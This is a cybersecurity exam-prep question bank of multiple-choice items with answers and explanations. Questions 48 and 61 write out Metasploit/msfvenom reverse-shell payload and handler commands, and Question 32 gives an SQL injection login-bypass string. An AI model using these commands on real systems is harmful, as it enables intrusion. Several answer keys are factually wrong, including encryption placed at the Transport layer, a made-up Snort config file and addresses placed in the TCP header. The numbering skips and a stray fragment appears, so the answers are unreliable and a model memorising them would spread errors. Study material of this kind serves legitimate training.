Exam Prep Questions Ver 1.

0
Question 1

>Question : This method of ethical hacking is done to enable businesses to identify exploitable
vulnerabilities in their environment that could lead to data breaches. What is it?

>Options :

1. Penetration testing

2. Intrusion detection testing

3. Internet stability testing

4. Statistical analysis testing

>Answer : Penetration testing.

>Explanation : Penetration testing is a simulated cyber attack against your computer system to check for
exploitable vulnerabilities. It is a crucial method for identifying and resolving security weaknesses before
malicious hackers can exploit them.

Question 2

>Question : As a cyber safety expert, you are responsible for the security policy that protects against
widespread cyberattacks and enables better network performance. What security products would you
recommend?

>Options :

1. Peripheral security

2. PII identification

3. One-time password protection

4. Network visibility and segmentation

>Answer : Network visibility and segmentation.

>Explanation : Network visibility and segmentation are essential for understanding and managing the
flow of traffic in a network, which is crucial for identifying potential security threats and ensuring better
network performance.
Question 3

>Question : Developers implement certain instances that help secure applications some of them are:
Generating new session tokens at every stage of a session, Using secure interactions between a user and
an application, Using well-developed web language. How does the developer support these security
instances?

>Options :

1. Applying full-disk encryption (FDE) to encrypt the on-device data

2. Deploying proper session handling

3. Applying patches to the database

4. Using third-party libraries for code building

>Answer : Deploying proper session handling.

>Explanation : Proper session handling is essential for maintaining the security of user sessions. It
involves generating new session tokens and ensuring secure interactions, which are key aspects
mentioned in the question.

Question 4

>Question : A cybersecurity expert examines the maritime risk assessment chart to assess and evaluate
their risk mitigation measures. Which risk assessment method should be used to identify threats?

>Options :

1. Iterative

2. Qualitative

3. Cumulative

4. Distributive

>Answer : Qualitative.

>Explanation :

Iterative risk assessment refers to a process that is repeated multiple times to refine and improve risk
identification and analysis. This method involves going through the assessment cycle repeatedly, taking
into account new information, changes in the environment, or the effectiveness of current controls.
While it's a valuable approach for continually updating risk assessments, it's not a method specifically
focused on the identification of threats.

Qualitative risk assessment is a method that uses a descriptive approach to identify and evaluate risks. It
involves the use of expert judgment, experience, and intuition to assess threats and vulnerabilities. This
method often categorizes risks into levels such as low, medium, and high based on their potential impact
and likelihood. For identifying threats in a maritime environment, a qualitative approach can be highly
useful, especially when specific threat data may be scarce or when dealing with complex and evolving
cyber threats.

Cumulative risk assessment looks at the overall risk from multiple sources or hazards added together.
This method is more about understanding the aggregate risk level rather than identifying individual
threats. It's useful for understanding the total risk exposure but does not directly apply to the initial
identification of specific threats.

Distributive. The term distributive doesn’t directly apply to a recognized method in risk assessment. It's
possible this option was meant to refer to something else, or it could be a misunderstanding or misprint.
Risk assessments typically involve terms like "quantitative," "qualitative," "static," and "dynamic," among
others, focusing on how risks are analyzed rather than "distributed."

Based on these explanations, the Qualitative risk assessment method (Option 2) is the most suitable for
identifying threats in the context given. This approach allows cybersecurity experts to leverage their
knowledge and experience to assess the threat landscape in maritime environments effectively,
especially where there may be a lack of concrete data or when dealing with novel or complex cyber
threats.

Question 5

>Question : Data is scanned on a layer-by-layer approach as it arrives. What is this called?

>Options :

1. Static-Based Threat Scanning

2. Dynamic-Based Threat Scanning

3. Stream-Based Threat Scanning

4. Random-Based Threat Scanning

>Answer : Stream-Based Threat Scanning.

>Explanation : Stream-Based Threat Scanning refers to the process where data is analyzed in a
sequential manner, layer by layer, as it is received. This method is efficient for real-time data analysis and
threat detection.

Question 6

>Question : Iptables is a standard firewall included in most Linux distributions by default. What is the
correct command to flush the IP tables?

>Options :
 1. sudo iptables -A

2. sudo iptables -r

3. sudo iptables -I

4. sudo iptables -F

>Answer : sudo iptables -F.

>Explanation : The command `sudo iptables -F` is used to flush (clear out) all the rules in the iptables
firewall. It effectively resets the iptables configuration to its default state.

Question 7

>Question : Phishing attacks are on the rise. To defend against these, what technique exposes locally
created phishing simulation servers behind NATs and firewalls to the public internet over secure tunnels?

>Options :

1. Metasploit

2. Dark trace

3. Amber

4. Ngrok

>Answer : Ngrok.

>Explanation : Ngrok is a tool that creates secure tunnels to local servers, making them accessible over
the internet. It's useful for testing phishing simulations in a controlled environment.

Question 8

>Question : According to the Trusted Computer System Evaluation Criteria (TCSEC), which 3 principles
should be included to oversee a scheduled external audit for TCSEC compliance?

>Options :

1. Insurance, Guarantee, Availability

2. Functionality, Effectiveness, Assurance

3. Assurance, Cost-Benefit Ratio, Conflict resolution

4. Auditing, Cost-Benefit Ratio, Depreciation value

>Answer : Functionality, Effectiveness, Assurance.

>Explanation : TCSEC focuses on functionality (how well the system performs security tasks),
effectiveness (the extent of security measures), and assurance (the confidence in security measures).

Question 9

>Question : Security Configuration Management tools automate the process of surveying all ports and
configurations of services or infrastructure across an enterprise. Which step should an organization
adopt?

>Options :

1. Track all vulnerabilities manually because not all of them pose equal risk

2. Get approval on what would be secured baseline for each managed device

3. Incident handling should be aligned with the disaster recovery plan

4. Incident handling should be approached in a reactive manner

>Answer : Get approval on what would be secured baseline for each managed device.

>Explanation : Establishing a secured baseline for each managed device ensures that all devices meet a
minimum standard of security, which is vital for maintaining the integrity of an organization's network.

Question 10

>Question : What is ARP caching?

>Options :

1. Method of sending back ARP cache entries

2. Method of storing network addresses

3. Matching MAC hardware addresses to IP packets

4. Matching IP address with MAC address

>Answer : Matching IP address with MAC address.

>Explanation : ARP caching is the process of storing the mappings of IP addresses to MAC addresses.
ARP (Address Resolution Protocol) cache is a key component in network communication.
Question 11

>Question : How are the Federal Information Processing Standards (FIPS) 140-2 Security Requirements
for Cryptographic Modules applied in implementing security-based solutions?

>Options :

1. Identification of references to several security glossaries.

2. Implementation of cryptographic-based security systems by federal organizations.

3. Provide guidelines like technical specifications.

4. Develop an organizational understanding for handling cybersecurity risks.

>Answer : Implementation of cryptographic-based security systems by federal organizations.

>Explanation : FIPS 140-2 provides a standardized framework for cryptographic modules used within
computer and telecommunication systems by federal organizations, ensuring the security of sensitive or
valuable data.

Question 13

>Question : This is an open-source cross-platform JavaScript run-time environment that executes

JavaScript code outside of a browser.

>Options :

1. javascriptijs

2. Java.js

3. j++

4. node.js

>Answer : node.js.

>Explanation : Node.js is an open-source, cross-platform JavaScript runtime environment that allows for
the execution of JavaScript code server-side, outside of a web browser.

Question 14

>Question : A spoofing attack is when a malicious party impersonates another device or user on a
network to launch attacks, steal data, or bypass access controls. Which of the following is NOT a spoofing
attack?

>Options :
 1. Keylogger infection

2. DNS Spoofing

3. ARP Poisoning

4. Man-In-The-Middle (MiTM) Attack

>Answer : Keylogger infection.

>Explanation : A keylogger infection involves logging the keys struck on a keyboard, often covertly, to
gain information about the user. This is different from spoofing attacks like DNS spoofing, ARP poisoning,
and MiTM attacks, which involve impersonation.

Question 15

>Question : A cybersecurity professional performs a penetration test using a methodical and thorough
approach. Which stage of the testing process involves determining the Scope & Strategy?

>Options :

1. Attack phase

2. Discovery phase

3. Reporting phase

4. Planning phase

>Answer : Planning phase.

>Explanation : The planning phase of a penetration test involves defining the scope and goals of a test,
including the systems to be tested and the testing methods to be used.

Question 16

>Question : Which tool would a cybersecurity professional use for cloud-based vulnerability scanning?

>Options :

1. Detectify

2. Cloud scanner

3. Nmap

4. Dark reader

>Answer : Detectify.
>Explanation : Detectify is a tool used for cloud-based vulnerability scanning, offering an automated
approach to identify vulnerabilities and security issues in web applications and websites.

Question 17

>Question : The following command "tcpdump -c 5 -i eth0" captures only a specific ___ number of
packets. Which is the correct option?

>Options :

1. Only 10

2. Only 5

3. Only 50

4. Null

>Answer : Only 5.

>Explanation :

tcpdump: This is the main command used to start the packet capturing process. tcpdump is a powerful
tool that allows you to capture and analyze network traffic passing through your system.

-c 5: This option tells tcpdump to capture only a specific number of packets, in this case, 5 packets. Once
5 packets are captured, tcpdump will stop.

-I eth0: The -I option is typically used to set the interface in monitor mode, which is a mode where the
network interface can capture all packets it can see, not just those addressed to it.

Question 19

>Question : Cybersecurity experts use different threat modeling strategies to identify threats and
prioritize strategies based on IT assets. Which one of the following is true for the Visual Agile and Simple
Threat modeling?

>Options :

1. It encrypts data based on DRM implementations

2. It helps to understand software piracy and licensing issues

3. It ensures that due care procedures and policies must be in place

 4. It can scale thousands of threat models across an organization

>Answer : It can scale thousands of threat models across an organization.

>Explanation : Visual Agile and Simple Threat modeling is a flexible and scalable approach that allows for
the development of numerous threat models, catering to various needs across an organization.

Question 20

>Question : When a large number of spilled credentials enter websites, attackers take advantage of
these credentials to gain unauthorized access into accounts for personal gains. What is this called?

>Options :

1. Large brute scanning

2. Make or break attack

3. Robin Rainbow

4. Credential stuffing

>Answer : Credential stuffing.

>Explanation : Credential stuffing is a type of cyber attack where stolen account credentials, typically
consisting of lists of usernames and/or email addresses and the corresponding passwords, are used to
gain unauthorized access to user accounts through large-scale automated login requests.

Question 21

>Question : Microsoft customer support database of 250 million entries was discovered to be publicly
accessible. What type of attack is perpetrated by disgruntled employees?

>Options :

1. Insider attack

2. Delos attack

3. DDoS attack

4. External attack

>Answer : Insider attack.

>Explanation : Insider attacks are malicious attacks perpetrated on a network or computer system by a
person with authorized system access, which includes disgruntled employees.

Question 22
>Question : What is the size of the MD6 Hash?

>Options :

1. 512

2. 128

3. 256

4. 1024

>Answer : 512.

>Explanation : MD6 (Message Digest algorithm 6) is a cryptographic hash function that can produce hash
values of variable length, but commonly the size is 512 bits.

Question 28

>Question : What is privilege escalation?

>Options :

1. Restricting privileges to view or edit files

2. Granting equal rights to individuals in multi-user accounts

3. Giving access to system files

4. Exploiting a bug, flawed design, or hardware vulnerability

>Answer : Exploiting a bug, flawed design, or hardware vulnerability.

>Explanation : Privilege escalation involves gaining elevated access to resources that are normally
protected from an application or user. This often occurs by exploiting a bug, flawed design, or hardware
vulnerability.
Question 29

>Question : Which reconnaissance tool will you use for automatic queries over 100 public data sources
(OSINT) to gather intelligence on IP addresses, domain names, e-mail addresses, names, and more?

>Options :

1. the harvester

2. ScanOSINT

3. Siphon

4. SpiderFoot

>Answer : SpiderFoot.

>Explanation : SpiderFoot is an open-source intelligence (OSINT) automation tool that integrates with
over 100 public data sources to gather intelligence on IP addresses, domain names, email addresses, and
more.

Question 30

>Question : What does this command do? "proxychains nmap -sT -PO -p 80 -iR"

>Options :

1. nmap proxy scan option is used here

2. It uses a chain of proxies to launch nmap scan

3. It uses VPN to launch the nmap scans

4. nmap is wrapped inside AV scanner

>Answer : It uses a chain of proxies to launch nmap scan.

>Explanation : The command uses Proxychains, a tool that forces any TCP connection made by any given
application to follow through proxy servers like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy. It is
used here to conduct an nmap scan through a chain of proxies.

Question 31

>Question : To enable companies with lower risk of vulnerabilities through insecure applications,
DevSecOps are merged into a single program. As a cybersecurity professional, how would you prevent
threats emerging through software vulnerabilities in applications?

>Options :

1. QuickBooks Online helps to sync data across all devices

2. Use AccountLedger Pro for simplified solutions

 3. Use CIA Copy test after identifying the organization's unique customer-based needs

4. Use DAST tools for finding security flaws

>Answer : Use DAST tools for finding security flaws.

>Explanation : Dynamic Application Security Testing (DAST) tools are used to find security vulnerabilities
in applications. They are essential in a DevSecOps environment to identify and mitigate threats arising
from software vulnerabilities.

Question 32

>Question : Which of the following input data will you use to test for SQL Injection attacks on MySQL,
MSSQL, Oracle, PostgreSQL, SQLite?

>Options :

1. 'OR''='

2. --& hlaj

3. X< y . 5

4. [empty]

>Answer : 'OR''='

>Explanation : The input 'OR''=' is a classic SQL injection payload used to test for vulnerabilities. It can
bypass login algorithms by always returning true, revealing information or allowing unauthorized access.
Question 33

>Question : What is Website Mirroring?

>Options :

1. To create a mirror copy of websites to launch phishing and MITM attacks

2. To attack the website for downloading its tools and privacy policy

3. To reciprocate meta data and hidden information

4. To establish a connection with both the nodes of the website

>Answer : To create a mirror copy of websites to launch phishing and MITM attacks.

>Explanation : Website mirroring involves creating a replica of a website, often used by attackers for
phishing and Man-in-the-Middle (MITM) attacks, misleading users into thinking they are visiting the
legitimate site.

Question 34

>Question : Which category of employees should attend the cybersecurity awareness training programs?

>Options :

1. System administrators

2. Database managers

3. CFO, CTO, and CEO

4. Every employee in the company

>Answer : Every employee in the company.

>Explanation : Cybersecurity awareness is crucial for all employees, regardless of their role, as everyone
in the organization can be a potential target for cyber attacks.

Question 35

>Question : How would you monitor network events using an open-source tool?

>Options :

1. Nemo

2. SolarWinds Threat monitor

3. Snort
 4. Spiderfoot

>Answer : Snort.

>Explanation : Snort is a widely-used open-source network intrusion detection system (NIDS) that can
monitor network events and detect potential threats.

Question 36

>Question : This is a system of interconnected servers located across the globe that uses geographical
proximity as the main criteria for distributing cached web content and web pages to end users. What is
this called?

>Options :

1. Content Delivery Network (CDN)

2. Proxy Load Monitor (PLM)

3. Dynamic Load Balancing (DLB)

4. Global Cache Container (GCC)

>Answer : Content Delivery Network (CDN).

>Explanation : A Content Delivery Network (CDN) is a network of servers distributed geographically to

provide faster delivery and high availability of content on the internet.

Question 37

>Question : Which one of these is a vulnerability of blockchain?

>Options :

1. Use of Reverse Sheet

2. Use of both private as well as public keys

3. TOR using chain of proxies

4. Endpoint vulnerabilities

>Answer : Endpoint vulnerabilities.

>Explanation : While blockchain technology is inherently secure, it can be vulnerable at the endpoints
where users interact with the blockchain network, such as wallets or exchanges.

Question 38
>Question : Which OSI layer is responsible for 'Encryption'?

>Options :

1. Physical

2. Session

3. Transport

4. Datalink

>Answer : Transport.

>Explanation : The Transport layer (Layer 4) of the OSI model is responsible for end-to-end
communication and data transfer, which includes encryption protocols like TLS (Transport Layer
Security).
Question 39

>Question : If two users have the same password they'll have the same password hashes. How can these
attacks be prevented?

>Options :

1. By matching each hash

2. By repeating each hash

3. By increasing each hash

4. By randomizing each hash

>Answer : By randomizing each hash.

>Explanation : Randomizing each hash, typically through a process called "salting," involves adding a
unique, random value to each password before hashing. This ensures that even if two users have the
same password, their hashes will be different, thus preventing attacks that rely on comparing hash
values.

Question 40

>Question : Based on what factor is risk prioritization implemented?

>Options :

1. Overall effect on the project

2. Load capacity of the servers

3. Budget allocation

4. Network layer attacks

>Answer : Overall effect on the project.

>Explanation : Risk prioritization is typically based on the overall effect of the risk on the project,
including factors like potential impact on security, cost, and project timelines.

Question 41

>Question : A private bank wishes to protect customer assets by providing customers with a more secure
online transaction experience. How can the bank achieve this to ensure that customers' information is
maintained in a secure environment?

>Options :
 1. PCI

2. NIST

3. HIPAA

4. Sarbanes-Oxley

>Answer : PCI.

>Explanation : The Payment Card Industry Data Security Standard (PCI DSS) is a set of security standards
designed to ensure that all companies that accept, process, store or transmit credit card information
maintain a secure environment, which is particularly relevant for banks handling online transactions.

Question 42

>Question : What is salting?

>Options :

1. Providing a mechanism in which data buckets are added and removed dynamically and on-demand.

2. Network administrator uses specific software to check for vulnerabilities in security.

3. All of the above.

4. Adding random data to the input of a hash function to guarantee a unique output of the hash even
when the inputs are the same.

>Answer : Adding random data to the input of a hash function to guarantee a unique output of the hash
even when the inputs are the same.

>Explanation : Salting is a technique used in hashing where random data (a salt) is added to the input of
a hash function to ensure that the output (hash) is unique, even if the input data (like a password) is not.

Question 43

>Question : Which GDPR article grants EU citizens the right of access which requires companies to detail
what personal data is being processed and how, upon request?

>Options :

1. Article 42

2. Article 17

3. Article 94

4. Article 15

>Answer : Article 15.

>Explanation : Article 15 of the General Data Protection Regulation (GDPR) grants individuals the right to
access their personal data and information about how this data is being processed.

Question 44

>Question : There are 26 letters in the English Language. Double them for both UPPER and lower cases
and the count settles on 52. Then we add the numeric digits: 52+10 = 62. So we have 62 characters in
total. For an 8-character-password it will be ______ which will make 2.1834011x10^14 possible
combinations.

>Options :

1. 456

2. 395

3. 62^8

4. 954

>Answer : 62^8.

>Explanation : For an 8-character password using 62 possible characters (26 uppercase + 26 lowercase +
10 digits), the number of possible combinations is 62^8, which equals approximately 2.1834011x10^14.

Question 45

>Question : As a cybersecurity manager, you have been given the task to establish systems that comply
with international security standards for encryption systems and sensitive cryptographic functions.
Which US federal agency should you approach to implement such standards?

>Options :

1. National Institute of Standards and Technology (NIST)

2. Federal Bureau of Investigation (FBI)

3. National Security Agency (NSA)

4. Department of Defence (DoD)

>Answer : National Institute of Standards and Technology (NIST).

>Explanation : NIST is responsible for developing standards, including those related to cybersecurity and
cryptographic functions. It's the go-to federal agency for guidelines on implementing international
security standards in these areas.

Question 46
>Question : This is an open-source host-based intrusion detection system (HIDS) that performs log
analysis, integrity checking, Windows registry monitoring, rootkit detection, time-based alerting, and
active response. It can be used to monitor one server or thousands of servers in a server/agent mode.

>Options :

1. Tomcat

2. Mon-net

3. Apache2

4. OSSEC

>Answer : OSSEC.

>Explanation : OSSEC is an open-source host-based intrusion detection system that provides a wide
range of monitoring and security analysis capabilities for both single and multiple server environments.

Question 47

>Question : This is a type of attack in which a malicious actor sends falsified ARP (Address Resolution
Protocol) messages over a local area network. This results in the linking of an attacker's MAC address
with the IP address of a legitimate computer or server on the network. Once the attacker's MAC address
is connected to an authentic IP address, the attacker will begin receiving any data that is intended for
that IP address.

>Options :

1. ARP Spoofing Attack

2. IP Hijacking Attack

3. ICMP Dump Attack

4. DNS Spoofing Attack

>Answer : ARP Spoofing Attack.

>Explanation : ARP spoofing is a type of attack where falsified ARP messages are sent over a network to
associate the attacker's MAC address with the IP address of a legitimate user or server on the network.

Question 48

>Question : Which Metasploit command creates Python payload shell?

>Options :
 1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to
Connect On> -f asp> shell.asp

2. msfvenom -p cmd/unix/reverse bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f

raw > shell.sh

3. msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f

raw > shell.pl

4. msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On>

-f raw > shell.py

>Answer : msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to

Connect On> -f raw > shell.py.

>Explanation : This Metasploit command uses msfvenom to create a reverse Python shell payload,
specifying the IP address and port for the connection and outputting the payload to a Python file.

Question 49

>Question : Reconnaissance or Footprinting is the first step a pen tester would take to discover lapses
and gather information on a target system. Prioritizing risks helps to efficiently allocate resources. What
is the outcome of risk prioritization?

>Options :

1. Install IDS inside firewalls on edge of network

2. Launch phishing attack for accessing user data

3. Install anti-virus and monitor the threats

4. Assess the impact of identified risk events

>Answer : Assess the impact of identified risk events.

>Explanation : Risk prioritization involves assessing the impact of identified risks to determine their
severity and potential consequences, enabling efficient allocation of resources to address the most
significant risks first.

Question 50

>Question : In TCP packet what is the size of source/destination address?

>Options :

1. 16 bits, 2 octets

2. 64 bits, 8 octets
 3. 32 bits, 4 octets

4. 8 bits, 1 octet

>Answer : 32 bits, 4 octets.

>Explanation : In a TCP packet, both the source and destination addresses are 32 bits (or 4 octets) in
size. This is characteristic of IPv4 addressing.
Question 51

>Question : Select a web application model that revolves around a standard such as ISO/IEC 12207 to
establish guidelines for the development, acquisition, and configuration of software systems.

>Options :

1. HRDE

2. BCAW

3. AN/RI

4. SDLC

>Answer : SDLC (Software Development Life Cycle)

>Explanation :
SDLC is a framework that describes the processes used during the development of software applications.
It covers phases such as planning, analysis, design, development, testing, deployment, and maintenance.
ISO/IEC 12207 is a standard for software lifecycle processes that aims to define all the tasks required for
developing and maintaining software. The SDLC can be aligned with ISO/IEC 12207 to ensure that
software development adheres to recognized international standards, thus ensuring quality, efficiency,
and security

Explanation of Each Acronym:

HRDE: This acronym is not widely recognized in the context of software development or web application
models. It could potentially stand for Human Resource Development Environment or something similar,
but without a standard context, it's speculative. HRDE could conceptually relate to aspects of
organizational development, training, or personnel management rather than software development
models.

AN/RI: This acronym isn't standard in the context of software development or web application models. It
could potentially refer to something like Analysis/Research & Innovation, but again, this is speculative
and not directly related to recognized software development processes or standards.

BCAW: This acronym is not commonly associated with software development models or standards. It
might be interpreted as Business Continuity Awareness Week, which is related to organizational
preparedness and continuity planning, rather than software development or ISO standards.urity.

Question 52

>Question : Flaws in applications and systems give way to vulnerabilities. Bugs or flaws in applications
are pathways to vulnerabilities. Which factor should be considered for risk assessment?
>Options :

1. What are the TCSEC evaluation classifications?

2. When to use browser cookies to store sessions?

3. What investments can improve business functions?

4. What are the critical technology assets of an organization?

>Answer : What are the critical technology assets of an organization?

>Explanation : Critical technology assets are vital for a risk assessment as vulnerabilities in these assets
can lead to significant security breaches. Understanding the criticality helps in prioritizing security
measures.

Question 53

>Question : Which of the following is a standard firewall included in most Linux distributions by default?

>Options :

1. Little snitch

2. PeerBlock

3. Tiny Wall

4. Iptables

>Answer : Iptables.

>Explanation : Iptables is the most commonly used firewall tool included by default in many Linux
distributions. It provides a robust and flexible framework for managing network traffic.

Question 54

>Question : All project stakeholders should be informed of any impending risks. Organizations that
assess, manage, and promptly communicate risks to stakeholders can make better decisions. Which
method will NOT be an effective risk management strategy?

>Options :

1. Integrated development environment (IDE) helps to discover and inform coders about problems they
need to fix.

2. Timely involvement of stakeholders helps their knowledge, views, and perceptions to be considered.

3. Structured and comprehensive approach leads to consistent and comparable results.

4. It should be an integral part of all organizational activities.

>Answer : Integrated development environment (IDE) helps to discover and inform coders about
problems they need to fix.

>Explanation : While IDEs are crucial for software development, they are not a direct method for risk
management communication and strategy in the broader organizational context.
Question 55

>Question : The steganography tool snow conceals text using __________ in files.

>Options :

1. Data

2. Lines

3. Text

4. Spaces

>Answer : Spaces.

>Explanation : The steganography tool 'snow' uses whitespace steganography, hiding messages in the
ASCII whitespace characters of text files, which often involves using spaces.

Question 56

>Question : A well-established healthcare organization built a system with multi-layered architecture to

comply with the privacy and security of the Health Insurance Portability and Accountability Act (HIPAA).
What system is used to identify and assess information security risks?

>Options :

1. Test Case development

2. Business process modeling notation

3. ITIL service operation

4. Octave risk assessment

>Answer : Octave risk assessment.

>Explanation : The Octave risk assessment method is a comprehensive approach that allows
organizations to identify and manage information security risks, making it suitable for healthcare
organizations needing to comply with HIPAA.

Question 57

>Question : How many bits does IPv6 addressing use?

>Options :

1. 32
 2. 64

3. 128

4. 256

>Answer : 128.

>Explanation : IPv6 addresses use 128 bits, which significantly increases the number of possible
addresses compared to the 32-bit addressing used in IPv4.

Question 58

>Question : It is important to detect web application vulnerabilities like SQL Injection, Buffer Overflow,
Cross-Site Scripting, and Cross-Site Request Forgery before trying to prevent them. How would a
pentester detect these attacks?

>Options :

1. Install IDS and firewalls

2. Install anti-virus and monitor the threats detected

3. Running netcat against the target network

4. Running vulnerability assessment tools against target network

>Answer : Running vulnerability assessment tools against target network.

>Explanation : Vulnerability assessment tools are designed to detect various types of web application
vulnerabilities including SQL Injection, Buffer Overflow, and others, making them the most appropriate
choice for a pentester.

Question 59

>Question : How are internal stakeholders informed about risks?

>Options :

1. Intranet announcement

2. Send confidential message in sealed envelope

3. Call for a general body meeting

4. Use Reporting and Alerts

>Answer : Use Reporting and Alerts.

>Explanation : Using reporting and alerts systems is an efficient and timely way to inform internal
stakeholders about risks, ensuring that they are kept up-to-date with the latest risk information.
Question 60

>Question : What is a Botnet?

>Options :

1. A botnet refers to a group of computers which have been infected by malware and have come under
the control of a malicious actor.

2. Self-propagated virus that infects an entire network by using ARP spoofing.

3. It is reverse shell threat actor that connects to the victim using reverse shell.

4. It is a type of malware that encrypts files on the victim's computer.

>Answer : A botnet refers to a group of computers which have been infected by malware and have come
under the control of a malicious actor.

>Explanation : A botnet is a network of computers that have been compromised by malware and are
controlled remotely by a threat actor, often used to perform coordinated attacks or send spam.

Question 61

>Question : What does this Metasploit command do? "use exploit/multi/handler; set PAYLOAD
linux/x86/shell/reverse_tcp; set LHOST 192.168.1.63; set LPORT 4444; exploit"

>Answer : Establishes a Linux reverse shell.

>Explanation : This Metasploit command sets up a reverse TCP shell exploit, allowing the user to execute
a reverse shell on a target Linux system using the specified local host and port.

Question 62

>Question : Computer A on Network A wants to send some data to another Computer B which lies on a
remote Network B. Which protocol would be suitable here for the communication?

>Answer : TCP (Transmission Control Protocol).

>Explanation : TCP is a reliable, connection-oriented protocol suitable for sending data between
computers on different networks, ensuring the integrity and reliability of the data transfer.

Question 63

>Question : What does the backdoor script web shell run on?
>Answer : Web server.

>Explanation : A backdoor web shell is a script that runs on a web server, allowing an attacker to control
and execute commands on the server remotely.

Question 64

>Question : This is an old-school method where an attacker tries to access a huge number of accounts at
once using some of the most commonly used passwords. What is it called?

>Answer : Password Spraying.

>Explanation : Password spraying is a technique where attackers use a few common passwords to try
and gain access to a large number of accounts, exploiting the use of weak and common passwords.

Question 65

>Question : Which type of vulnerability management process addresses these questions: How would
you know if this vulnerability is a true or false positive? Is this vulnerability directly exploitable from the
Internet? How difficult is it to exploit this vulnerability? Is there a known published exploit code for this
vulnerability? How would business be impacted if this vulnerability were exploited?

>Answer : Evaluating Vulnerabilities.

>Explanation : This process involves evaluating the nature, exploitability, and impact of vulnerabilities,
distinguishing between true and false positives, and assessing the potential business impact.

Question 66

>Question : Take a look at this snort rule. Where is the variable $EXTERNAL_NET configured?

>Options :

1. snort.nmf

2. conLsnort

3. classification.snort

4. external.conf

>Answer : external.conf.

>Explanation : In Snort, variables like $EXTERNAL_NET are typically configured in the external.conf file,
which is used to set up network variables for Snort rules.
Question 67

>Question : This is an open source penetration testing tool that automates the process of detecting and
exploiting SQL injection flaws and taking over of database servers.

>Options :

1. Sqlmap

2. Inject coqud

3. VulScanner

4. HarSon

>Answer : Sqlmap.

>Explanation : Sqlmap is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection vulnerabilities in database servers.

Question 68

>Question : Which of the following will you use to conduct Man-in-the-Middle (MiTM) attacks?

>Options :

1. nmap

2. Wireshark

3. Bettercap

4. the Harvester

>Answer : Bettercap.

>Explanation : Bettercap is a powerful, flexible and portable tool created to perform various types of
MiTM attacks against a network, attacks on the Ethernet or WiFi networks, and much more.

Question 69

>Question : This product lets you visualize your Elasticsearch data and navigate the Elastic Stack. It
detects the anomalies hiding in your Elasticsearch data and explores the properties that significantly
influence them with unsupervised machine learning features.

>Options :

1. Stackrule

2. Ioganalysis
 3. Vi monitor

4. Kibana

>Answer : Kibana.

>Explanation : Kibana is a product that allows users to visualize their Elasticsearch data and navigate the
Elastic Stack, providing features for detecting anomalies and exploring data properties using machine
learning.

Question 70

>Question : What type of computing can instantly break the encryption of sensitive data protected by
today's strongest security?

>Options :

1. Quantum

2. Stable

3. Dynamic

4. Static

>Answer : Quantum.

>Explanation : Quantum computing has the potential to instantly break the encryption of sensitive data
protected by current encryption methods, due to its ability to solve complex calculations much faster
than traditional computing.

Question 71

>Question : Companies require event monitoring systems to support their system logging and
monitoring services. Which service is preferred for SEM implementation?

>Options :

1. Comply with TCP protocol

2. Monitor access to sensitive data and authorization actions

3. Automatically discover Active Directory and Workgroup assets

4. Seize the evidence from the crime scene without a warrant

>Answer : Monitor access to sensitive data and authorization actions.

>Explanation : Monitoring access to sensitive data and authorization actions is crucial for Security Event
Management (SEM) as it helps in identifying and responding to security incidents effectively.

Question 72

>Question : What is the purpose of creating a new security policy and training materials covering
software security, asset security, and other checks for layers of security architecture of a company?

>Options :

1. Providing systematic technical assessment of systems and applications

2. Due diligence act of investigation and assessment

3. Providing authentication and authorization-based information access

4. Applying Defense-in-depth strategy for access controls

>Answer : Applying Defense-in-depth strategy for access controls.

>Explanation : The creation of a new security policy and training materials aims to apply a Defense-in-
depth strategy, ensuring multiple layers of security controls and reducing the risk of a single point of
failure.

Question 73

>Question : This is a computer program designed to provide continued privileged kernel access to a
computer while actively hiding its presence.

>Options :

1. Virus

2. Trojan

3. Keylogger

4. Rootkit

>Answer : Rootkit.

>Explanation : A rootkit is a type of malware designed to gain privileged access to a computer while
concealing its presence. It typically targets the kernel level to control the system without detection.

Question 74

>Question : A CVE ID is assigned to a vulnerability assisting stakeholders to identify relevant information

of the vulnerability and obtain solutions. How are CVE identifiers assigned?
>Options :

1. Capability Vulnerability Engine

2. Central Vector Entity

3. Central Vulnerability Engine

4. CVE Numbering Authority (CNA)

>Answer : CVE Numbering Authority (CNA).

>Explanation : CVE identifiers are assigned by the CVE Numbering Authority (CNA), a group responsible
for managing the assignment of unique identifiers to new vulnerabilities and overseeing the CVE
database.

Question 75

>Question : What type of protocols operate in the Data representation and encryption OSI layer?

>Options :

1. XML, JSON

2. SMTP

3. HTTP

4. TCP, IP

>Answer : XML, JSON.

>Explanation : In the OSI model, protocols like XML and JSON operate in the Presentation layer, which is
responsible for data representation, encryption, and similar functions.

Question 76

>Question : Which tool or service is used to view of an organization's information security and event log
management that synthesizes data from several sources?

>Options :

1. Intrusion Detection Systems (IDS)

2. Security Information and Event Management (SIEM)

3. Pentesting tools

4. Open-source Intrusion Prevention Systems (IPS)

>Answer : Security Information and Event Management (SIEM).

>Explanation : SIEM tools are used for security information and event management, combining data
from various sources to provide a comprehensive view of an organization's information security.

Question 77

>Question : What does NIDS stand for?

>Options :

1. Network Intrusion Detection System

2. None of the above

3. Network Identification Detection Software

4. Network Inspection Detection Software

>Answer : Network Intrusion Detection System.

>Explanation : NIDS stands for Network Intrusion Detection System, which monitors network traffic for
suspicious activity and issues alerts when such activities are detected.

Question 78

>Question : Penetration testing enables organizations to significantly reduce cybersecurity risk by

eliminating vulnerabilities that evade automated assessments. What is the first step in conducting a Pen
Test?

>Options :

1. Clearing the log files

2. Exploiting the system

3. Information gathering

4. Planting malware

>Answer : Information gathering.

>Explanation : The first step in conducting a penetration test is information gathering, which involves
collecting as much data as possible about the target system, network, and organization.

Question 79

>Question : Threats can be detected by using Security Information and Event Management (SIEM)
technology to collect event data from security systems, networks, and computers. What is the advantage
of using SIEM?
>Options :

1. Review relevant data to provide indicators of market trend

2. Evaluates businesses, projects, budgets, and other finance-related transactions

3. Compiles real-time monitoring and incident management capabilities of a Security Event Manager
(SEM)

4. In network monitoring, it provides insights to security operators

>Answer : Compiles real-time monitoring and incident management capabilities of a Security Event
Manager (SEM).

>Explanation : SIEM technology offers the advantage of compiling real-time monitoring and incident
